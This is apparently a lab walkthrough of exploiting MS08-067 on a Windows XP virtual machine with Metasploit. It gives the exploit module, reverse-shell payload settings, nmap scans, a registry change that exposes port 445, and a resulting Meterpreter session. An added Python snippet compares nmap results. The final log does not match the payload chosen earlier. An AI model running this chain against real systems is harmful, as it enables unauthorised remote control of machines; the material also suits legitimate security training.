Exploiting a vulnerability with the Metasploit framework

Kali:192.168.163.144
XP:192.168.163.136

Turn off the firewall on the XP machine and check that the two machines can ping each other.

msf > search ms08_067
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

————————————————

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > 

————————————————

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp

————————————————


msf exploit(ms08_067_netapi) > set LHOST 192.168.163.144
LHOST => 192.168.163.144
msf exploit(ms08_067_netapi) > set RHOST 192.168.163.136
RHOST => 192.168.163.136

————————————————

msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.163.144:4444 
[*] 192.168.163.136:445 - Automatically detecting the target...
[*] 192.168.163.136:445 - Fingerprint: Windows XP - Service Pack 3 - lang:Chinese - Traditional
[*] 192.168.163.136:445 - Selected Target: Windows XP SP3 Chinese - Traditional (NX)
[*] 192.168.163.136:445 - Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.

————————————————

root@localhost:~# nmap -PS 192.168.163.136
Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-28 21:53 EST
Nmap scan report for 192.168.163.136
Host is up (0.0017s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
MAC Address: 00:0C:29:BA:06:17 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.12 seconds

————————————————

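How to open port 445: go to Start > Run and enter regedit, then edit the registry and add the following value:

Hive: HKEY_LOCAL_MACHINE
Key: System\CurrentControlSet\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 1

Restart, then go to Run > CMD and enter netstat -an to see the open ports.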

————————————————

root@localhost:~# nmap -PS 192.168.163.136 445

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-28 22:02 EST
setup_target: failed to determine route to 445 (0.0.1.189)
Nmap scan report for 192.168.163.136
Host is up (0.00062s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:BA:06:17 (VMware)
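
An added example, not part of the original post: a Python parser that compares the port tables of the two nmap runs shown above and reports which listener the SMBDeviceEnabled change exposed. The function names are hypothetical, and the sample text is the port-table rows copied from those two scans.

```python
import re

# Port-table rows copied from the two nmap runs on this page
# (before and after setting SMBDeviceEnabled and rebooting the XP machine).
SCAN_BEFORE = """\
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
"""
SCAN_AFTER = """\
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
"""

# One row of nmap's normal-output port table: "<port>/<proto> <state> <service>"
ROW = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)")

def open_ports(nmap_text):
    """Return {(port, proto): service} for rows whose state is exactly 'open'."""
    found = {}
    for line in nmap_text.splitlines():
        m = ROW.match(line.strip())
        if m and m.group(3) == "open":
            found[(int(m.group(1)), m.group(2))] = m.group(4)
    return found

def exposure_diff(before_text, after_text):
    """Compare two scans; return (newly_open, no_longer_open) as sorted lists."""
    before, after = open_ports(before_text), open_ports(after_text)
    added = sorted((p, pr, after[(p, pr)]) for (p, pr) in after.keys() - before.keys())
    removed = sorted((p, pr, before[(p, pr)]) for (p, pr) in before.keys() - after.keys())
    return added, removed

if __name__ == "__main__":
    added, removed = exposure_diff(SCAN_BEFORE, SCAN_AFTER)
    for port, proto, service in added:
        print(f"NEW  {port}/{proto} ({service})")
    for port, proto, service in removed:
        print(f"GONE {port}/{proto} ({service})")
```

Run against saved scans of your own hosts, a NEW line for 445/tcp is the signal that direct-hosted SMB has become reachable and should be patched or filtered.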

————————————————

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese
[*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.163.136
[*] Meterpreter session 1 opened (192.168.163.144:41614 -> 192.168.163.136:4444) at 2019-11-29 17:29:32

meterpreter >
